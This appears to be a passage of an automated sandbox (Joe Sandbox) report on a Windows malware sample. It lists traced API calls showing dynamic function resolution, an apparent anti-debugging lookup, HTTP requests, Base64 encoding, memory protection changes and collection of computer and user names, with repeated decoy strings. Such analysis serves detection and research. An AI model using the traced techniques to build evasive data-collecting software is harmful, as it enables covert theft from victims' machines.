GetProcessHeap HeapFree 15943->15945 15944->15857 15945->15944 15946->15857 15948 86a7a0 lstrcpy 15947->15948 15949 855119 15948->15949 15950 8547b0 2 API calls 15949->15950 15951 855125 15950->15951 16107 868ea0 15951->16107 15953 855184 15954 855192 lstrlen 15953->15954 15955 8551a5 15954->15955 15956 868ea0 4 API calls 15955->15956 15957 8551b6 15956->15957 15958 86a740 lstrcpy 15957->15958 15959 8551c9 15958->15959 15960 86a740 lstrcpy 15959->15960 15961 8551d6 15960->15961 15962 86a740 lstrcpy 15961->15962 15963 8551e3 15962->15963 15964 86a740 lstrcpy 15963->15964 15965 8551f0 15964->15965 15966 86a740 lstrcpy 15965->15966 15967 8551fd InternetOpenA StrCmpCA 15966->15967 15968 85522f 15967->15968 15969 8558c4 InternetCloseHandle 15968->15969 15970 868b60 3 API calls 15968->15970 15976 8558d9 ctype 15969->15976 15971 85524e 15970->15971 15972 86a920 3 API calls 15971->15972 15973 855261 15972->15973 15974 86a8a0 lstrcpy 15973->15974 15975 85526a 15974->15975 15977 86a9b0 4 API calls 15975->15977 15980 86a7a0 lstrcpy 15976->15980 15978 8552ab 15977->15978 15979 86a920 3 API calls 15978->15979 15981 8552b2 15979->15981 15988 855913 15980->15988 15982 86a9b0 4 API calls 15981->15982 15983 8552b9 15982->15983 15984 86a8a0 lstrcpy 15983->15984 15985 8552c2 15984->15985 15986 86a9b0 4 API calls 15985->15986 15987 855303 15986->15987 15989 86a920 3 API calls 15987->15989 15988->15934 15990 85530a 15989->15990 15991 86a8a0 lstrcpy 15990->15991 15992 855313 15991->15992 15993 855329 InternetConnectA 15992->15993 15993->15969 15994 855359 HttpOpenRequestA 15993->15994 15996 8558b7 InternetCloseHandle 15994->15996 15997 8553b7 15994->15997 15996->15969 15998 86a9b0 4 API calls 15997->15998 15999 8553cb 15998->15999 16000 86a8a0 lstrcpy 15999->16000 16001 8553d4 16000->16001 16002 86a920 3 API calls 16001->16002 16003 8553f2 16002->16003 16004 86a8a0 lstrcpy 16003->16004 16005 8553fb 16004->16005 16006 86a9b0 4 API calls 16005->16006 16007 85541a 16006->16007 16008 86a8a0 lstrcpy 16007->16008 16009 855423 16008->16009 16010 86a9b0 4 API calls 16009->16010 16011 855444 16010->16011 16012 86a8a0 lstrcpy 16011->16012 16013 85544d 16012->16013 16014 86a9b0 4 API calls 16013->16014 16015 85546e 16014->16015 16108 868ead CryptBinaryToStringA 16107->16108 16110 868ea9 16107->16110 16109 868ece GetProcessHeap RtlAllocateHeap 16108->16109 16108->16110 16109->16110 16111 868ef4 ctype 16109->16111 16110->15953 16112 868f05 CryptBinaryToStringA 16111->16112 16112->16110 16116->15391 16359 859880 16117->16359 16119 8598e1 16119->15398 16121 86a740 lstrcpy 16120->16121 16122 85fb16 16121->16122 16294 86a740 lstrcpy 16293->16294 16295 860266 16294->16295 16296 868de0 2 API calls 16295->16296 16297 86027b 16296->16297 16298 86a920 3 API calls 16297->16298 16299 86028b 16298->16299 16300 86a8a0 lstrcpy 16299->16300 16301 860294 16300->16301 16302 86a9b0 4 API calls 16301->16302 16360 85988d 16359->16360 16363 856fb0 16360->16363 16362 8598ad ctype 16362->16119 16366 856d40 16363->16366 16367 856d63 16366->16367 16368 856d59 16366->16368 16382 856530 16367->16382 16368->16362 16372 856dbe 16372->16368 16392 8569b0 16372->16392 16374 856e2a 16374->16368 16375 856ee6 VirtualFree 16374->16375 16376 856ef7 16374->16376 16375->16376 16378 856f26 FreeLibrary 16376->16378 16379 856f38 16376->16379 16381 856f41 16376->16381 16377 8689f0 2 API calls 16377->16368 16378->16376 16380 8689f0 2 API calls 16379->16380 16380->16381 16381->16368 16381->16377 16383 856542 16382->16383 16385 856549 16383->16385 16402 868a10 GetProcessHeap RtlAllocateHeap 16383->16402 16385->16368 16386 856660 16385->16386 16389 85668f VirtualAlloc 16386->16389 16388 856730 16390 856743 VirtualAlloc 16388->16390 16391 85673c 16388->16391 16389->16388 16389->16391 16390->16391 16391->16372 16393 8569c9 16392->16393 16397 8569d5 16392->16397 16394 856a09 LoadLibraryA 16393->16394 16393->16397 16395 856a32 16394->16395 16394->16397 16399 856ae0 16395->16399 16403 868a10 GetProcessHeap RtlAllocateHeap 16395->16403 16397->16374 16398 856ba8 GetProcAddress 16398->16397 16398->16399 16399->16397 16399->16398 16400 8689f0 2 API calls 16400->16399 16401 856a8b 16401->16397 16401->16400 16402->16385 16403->16401

                              Executed Functions

                              Function 00869860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 869860-869874 call 869750 663 869a93-869af2 LoadLibraryA * 5 660->663 664 86987a-869a8e call 869780 GetProcAddress * 21 660->664 666 869af4-869b08 GetProcAddress 663->666 667 869b0d-869b14 663->667 664->663 666->667 668 869b46-869b4d 667->668 669 869b16-869b41 GetProcAddress * 2 667->669 671 869b4f-869b63 GetProcAddress 668->671 672 869b68-869b6f 668->672 669->668 671->672 673 869b71-869b84 GetProcAddress 672->673 674 869b89-869b90 672->674 673->674 675 869b92-869bbc GetProcAddress * 2 674->675 676 869bc1-869bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75550000,015C0570), ref: 008698A1
                              • GetProcAddress.KERNEL32(75550000,015C05A0), ref: 008698BA
                              • GetProcAddress.KERNEL32(75550000,015C0840), ref: 008698D2
                              • GetProcAddress.KERNEL32(75550000,015C0738), ref: 008698EA
                              • GetProcAddress.KERNEL32(75550000,015C0558), ref: 00869903
                              • GetProcAddress.KERNEL32(75550000,015C88E0), ref: 0086991B
                              • GetProcAddress.KERNEL32(75550000,015B6980), ref: 00869933
                              • GetProcAddress.KERNEL32(75550000,015B6960), ref: 0086994C
                              • GetProcAddress.KERNEL32(75550000,015C06A8), ref: 00869964
                              • GetProcAddress.KERNEL32(75550000,015C06D8), ref: 0086997C
                              • GetProcAddress.KERNEL32(75550000,015C06F0), ref: 00869995
                              • GetProcAddress.KERNEL32(75550000,015C05E8), ref: 008699AD
                              • GetProcAddress.KERNEL32(75550000,015B69A0), ref: 008699C5
                              • GetProcAddress.KERNEL32(75550000,015C0708), ref: 008699DE
                              • GetProcAddress.KERNEL32(75550000,015C0600), ref: 008699F6
                              • GetProcAddress.KERNEL32(75550000,015B67A0), ref: 00869A0E
                              • GetProcAddress.KERNEL32(75550000,015C0750), ref: 00869A27
                              • GetProcAddress.KERNEL32(75550000,015C0858), ref: 00869A3F
                              • GetProcAddress.KERNEL32(75550000,015B6740), ref: 00869A57
                              • GetProcAddress.KERNEL32(75550000,015C0888), ref: 00869A70
                              • GetProcAddress.KERNEL32(75550000,015B67E0), ref: 00869A88
                              • LoadLibraryA.KERNEL32(015C0870,?,00866A00), ref: 00869A9A
                              • LoadLibraryA.KERNEL32(015C0900,?,00866A00), ref: 00869AAB
                              • LoadLibraryA.KERNEL32(015C08A0,?,00866A00), ref: 00869ABD
                              • LoadLibraryA.KERNEL32(015C08B8,?,00866A00), ref: 00869ACF
                              • LoadLibraryA.KERNEL32(015C08D0,?,00866A00), ref: 00869AE0
                              • GetProcAddress.KERNEL32(75670000,015C0918), ref: 00869B02
                              • GetProcAddress.KERNEL32(75750000,015C08E8), ref: 00869B23
                              • GetProcAddress.KERNEL32(75750000,015C8CE8), ref: 00869B3B
                              • GetProcAddress.KERNEL32(76BE0000,015C8E98), ref: 00869B5D
                              • GetProcAddress.KERNEL32(759D0000,015B69C0), ref: 00869B7E
                              • GetProcAddress.KERNEL32(773F0000,015C87F0), ref: 00869B9F
                              • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00869BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00869BAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 4ccd7812e6fdac479c3f387bcc6ab662f512f7c50d726f68879d97ff87e422db
                              • Instruction ID: 90e3eadb59a4b1e9a1602f54ebf73df20ba9db28163c6ff85b362cd9d4b72954
                              • Opcode Fuzzy Hash: 4ccd7812e6fdac479c3f387bcc6ab662f512f7c50d726f68879d97ff87e422db
                              • Instruction Fuzzy Hash: D5A1FAB67102509FD344EFE9ED89A6637F9F7A8301714851BA609C3274DE399843CBD2
                              Function 008545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 8545c0-854695 RtlAllocateHeap 781 8546a0-8546a6 764->781 782 8546ac-85474a 781->782 783 85474f-8547a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0085460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0085479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008546AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008546D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008545F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008546C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008545DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008545D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008546B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008545C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008545E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00854638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0085475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008546CD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 08b6f45c390f76d0f3d60777f1fd06da037fcf2904bc1416c467a916b29d7295
                              • Instruction ID: 8cc7c519e88b0b52237ea4b834526effc4448cb6bb5fb9ff19776b1bf0792d03
                              • Opcode Fuzzy Hash: 08b6f45c390f76d0f3d60777f1fd06da037fcf2904bc1416c467a916b29d7295
                              • Instruction Fuzzy Hash: 654137A07C3614EADF2CB7B4884EE9DB752FF42744F509094FC689A384CBF5A5804722
                              Function 00856280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                              • HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0085646D
                              • InternetCloseHandle.WININET(00000000), ref: 008564EF
                              • InternetCloseHandle.WININET(00000000), ref: 008564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00856503
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 0f957a6f24d86e1dbe71a0375d9b44713c15d73852ad251220181530a77912ca
                              • Instruction ID: 843c3b07cd3fc67f53ee4ea0d3c08830df315fea42c386f605510cbbc66f4a39
                              • Opcode Fuzzy Hash: 0f957a6f24d86e1dbe71a0375d9b44713c15d73852ad251220181530a77912ca
                              • Instruction Fuzzy Hash: 93714071A00218EBDB14DFD4CC49BEEB774FB54701F508159F509AB290EBB46A89CF92
                              Function 008678E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1275 8678e0-867937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 867942-867945 1275->1276 1277 867939-86793e 1275->1277 1278 867962-867972 1276->1278 1277->1278
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 05fe64e0312b6ec10f5685aeca4e0c329dd880f3f6561f6edd8b0eb19ca02d0f
                              • Instruction ID: ab74a08e4e6c200f815139d93537b4342079e74d8338322fe5a6d2007e5a5d9e
                              • Opcode Fuzzy Hash: 05fe64e0312b6ec10f5685aeca4e0c329dd880f3f6561f6edd8b0eb19ca02d0f
                              • Instruction Fuzzy Hash: D8016DB1A04208EBD700DF99DD45BAABBB8FB04B25F10425AEA45E2280C77859048BE2
                              Function 00867850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
